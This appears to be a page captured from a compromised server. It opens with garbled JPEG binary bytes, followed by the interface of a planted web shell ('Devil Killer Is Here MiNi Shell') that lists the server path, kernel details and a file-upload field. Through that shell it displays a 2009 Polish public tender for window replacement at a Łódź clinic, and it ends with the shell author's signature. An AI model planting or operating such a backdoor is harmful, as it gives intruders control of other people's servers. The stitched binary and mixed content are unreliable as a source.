JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090901/144737-N-2009.html

<p class="kh_header"><b>Łódź: Wymiana okien w budynku Miejskiej Przychodni Tatrzańska 93-279 Łódź, ul.Tatrzańska 109</b><br>
<b>Numer ogłoszenia: 144737 - 2009; data zamieszczenia: 01.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejska Przychodnia "Tatrzańska" , ul. Tatrzańska 109, 93-279 Łódź, woj. łódzkie, tel. 042 6435859, 6435001, faks 042 6435001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mptatrzanska.lekarz.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana okien w budynku Miejskiej Przychodni Tatrzańska 93-279 Łódź, ul.Tatrzańska 109.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są następujące  zadania 
1.  Wymiana  części  istniejącej  stolarki  okiennej  obejmuje  w  szczególności
a)  Wymianę  okien  drewnianych
b)  Wymianę  witryn  stalowych  parteru. 
2.  Zapewnienie  gwarancji  obejmującej  przedmiot  zamówienia  na  okres  5  lat.
Okres  gwarancji  na  użyte  materiały  i  urządzenia  określają  dokumenty  gwarancyjne,  które  Wykonawca  zobowiązany  jest  dostarczyć  Zamawiającemu.

Ad a).  Stolarka  PCW .
Zaprojektowano  okna  PCW ,  oznaczone  symbolami  OP-2  do  OP-10
o  następujących  parametrach  technicznych 
.kolor  biały ,
.profil  trzykomorowy ,
.szyby  zespolone  jednokomorowe  U = 1,0 W/m2K  ( 4/16/4 ) ,
.podział  okien  i  sposób  otwierania  skrzydeł  okiennych  wg  zestawienia 
- rys.  nr 3 ,  z  możliwością  ustawienia  ich  na  mikrorozszczelnieniu - jedno  
skrzydło  w  każdym  oknie ,
.okucia  obwiedniowe  odpowiadające  parametrom  okuć  typu  ROTO  lub  WINKHAS ,
.klamki  okienne  dostępne  z  poziomu  podłogi .

Ad b).  Stolarka  aluminiowa .
Zaprojektowano  witrynę  aluminiową ,  oznaczoną  symbolem  WP  i  NP  o  następujących  parametrach  technicznych 
.kolor  naturalny  aluminium ,
.profil  ciepły ,
.szyby  zespolone  jednokomorowe  U = 1,0 W/m2K
- szyba  zewnętrzna  klasy  P2 ,
- szyba  wewnętrzna  zwykła  o  grubości  dostosowanej  do  powierzchni  
   szyb ,
.podział  witryny  wg  zestawienia - rys.  nr 3 .
	
Miejsce realizacji przedmiotu zamówienia -  Miejska Przychodnia TATRZAŃSKA w Łodzi ul. Tatrzańska  109, 93-279 Łódź, tel. (42)  643-39-72  i  fax (42)  643-50-01.

Szczegółowy opis przedmiotu zamówienia (zakres robót) został opisany w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych,, stanowiących załączniki do Specyfikacji Istotnych Warunków Zamówienia (SIWZ).
Tam gdzie w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót, SIWZ, zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca materiałów), oznacza to również określenie materiałów równoważnych pod warunkiem, że zagwarantują one realizację robót w zgodzie z pozwoleniem na budowę oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach. Wykazanie równoważności zaoferowanego materiału spoczywa na Wykonawcy, a zastosowanie tego materiału wymaga pisemnej zgody Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.42.10.00-4, 45.44.21.00-8, 45.26.26.00-7, 45.45.00.00-6, 45.11.12.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 03.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W przedmiotowym postepowniu Zamawiajacy nie przewiduje złożenia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wszyscy Wykonawcy, którzy:               1.Spełniają warunki określone w art. 22 ust. 1 i 2 Ustawy z dnia 29.01.04 r.    Prawo zamówień publicznych (Dz . U. Nr 223, poz. 1655 z późn. zm.). 
2. Spełnią dodatkowe wymogi wskazane w SIWZ,
3. Złożą dokumenty wymagane przez Zamawiającego określone w SIWZ.    
Ocena spełnienia ww. warunków dokonana będzie na podstawie i oświadczeń i dokumentów załączonych do oferty - spełnia /nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)Kompletna oferta musi zawierać:
a)Formularz  Ofertowy - Załącznik nr 1 do niniejszej SIWZ - sporządzony na  podstawie  Kosztorysu  - Załącznik nr 1a do  niniejszej SIWZ (który również należy załączyć do oferty)
b)przedmiary  robót -  Kosztorys  nakładczy -  Załącznik  nr  7  (które również należy załączyć do oferty).                                                       	
(Zamawiający  informuje, że  przedmiary  nie  mają  charakteru  wiążącego, 	są  tylko  dokumentem  pomocniczym, a  Wykonawcy  mają  prawo  dokonać  	zmian  wykraczających  poza  przedmiar).

c)Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego Załącznik nr 2 do niniejszej SIWZ,
d)Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej,
e)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamowienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. 
f)Podpisany wzór umowy (z zaparafowaniem każdej strony) stanowiący 
Załącznik nr 3 do niniejszej SIWZ .
g)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarcze, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
h)Wykaz wykonanych zamówień  o  podobnym  charakterze - Załącznik nr 4         do niniejszej SIWZ  zgodnie z zapisami pkt 8.3 SIWZ,  min. 1 zamówienie oraz referencje  min.1 dla wymienionej(ych) w wykazie zamówień. 
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców - referencje  ma  obowiązek  złożyć  ten  lub  ci  Wykonawcy, którzy  w  imieniu  wszystkich  wykazywać  będą  spełnianie  tego  warunku.
i) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, tj.:
a)kierownika budowy w specjalności ogólnobudowlanej,
Należy załączyć dokument uprawnień oraz zaświadczenie z właściwej izby samorządu zawodowego, potwierdzające przynależność do izby samorządu
j)Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, zgodnie z zapisami pkt 8.5 SIWZ.
k)aktualną  informację  z  Krajowego  Rejestru  Karnego  w  zakresie  określonym  w art. 24 ust. 1 pkt. 4 - 8 ustawy p. z. p. wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
l)aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy p. z. p.  wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - dotyczy podmiotu zbiorowego,
m)aktualne  zaświadczenie  właściwego  naczelnika  urzędu  skarbowego oraz że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenia że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
n)aktualnego zaświadczenia właściwego oddziału ZUS-u lub KRUS-u potwierdzającego odpowiednio, że Wykonawca nie zalega z opłacaniem  składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenia że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
o)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosownie  do  treści  Rozporządzenia  Prezesa  Rady  Ministrów  z  dnia  19  maja  2006  roku  w  sprawie  dokumentów  jakie  może  żądać  Zamawiający  od  Wykonawcy  oraz  form  w  jakiej  te  dokumenty  mogą  być  składane  zamiast dokumentów, o których mowa powyżej  w:
1)pkt III.1. l, m, n) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b) nie  zalega  z  uiszczeniem  podatków, opłat, składek  na  ubezpieczenie  społeczne  i  zdrowotne  albo,  że  uzyskał  przewidziane  prawem  zwolnienie, odroczenie  lub  rozłożenie  na  raty  zaległych  płatności  lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu;
c)  nie  orzeczono  wobec  niego  zakazu  ubiegania  się  o  zamówienie;
2) pkt  III.1.k)  składa  zaświadczenie  właściwego  organu  sądowego  lub  administracyjnego  kraju  pochodzenia  albo  zamieszkania  osoby, której  dokumenty  dotyczą, w  zakresie  określonym  w  art. 24 ust. 1 pkt 4-8 u.p.z.p.  3) Dokumenty, o których mowa powyżej w pkt III.o.1.a i c oraz w pkt III.o.2 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Natomiast dokument, o  którym  mowa  powyżej  w                     pkt. III.o.1.b powinien  być  wystawiony  nie  wcześniej  niż  3 miesiące przed upływem terminu składania ofert.
2)  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym lub  administracyjnym, albo  organem  samorządu  zawodowego  lub  gospodarczego  odpowiedniego  kraju  pochodzenia  osoby  lub  kraju, w  którym  Wykonawca  ma  siedzibę  lub  miejsce  zamieszkania. Postanowienia  pkt III.o.3  niniejszej  SIWZ  znajdują  odpowiednie  zastosowanie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mptatrzanska.lekarz.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać nieodpłatnie w siedz Zam. od pon do piątku w godz.9-15 pokók 114 c I pietro.Na pisem. wniosek Wykon. SIWZ moze zostać przesłana pocztą. Wykon. ponosi koszty przesyłki..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2009 godzina 15:00, miejsce: MP Tatrzanska 93-279 Łódź, ul.Tatrzanska 109, pokój 112 I piętro sekretariat, od pon do piatku w godz.8.00-15.00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com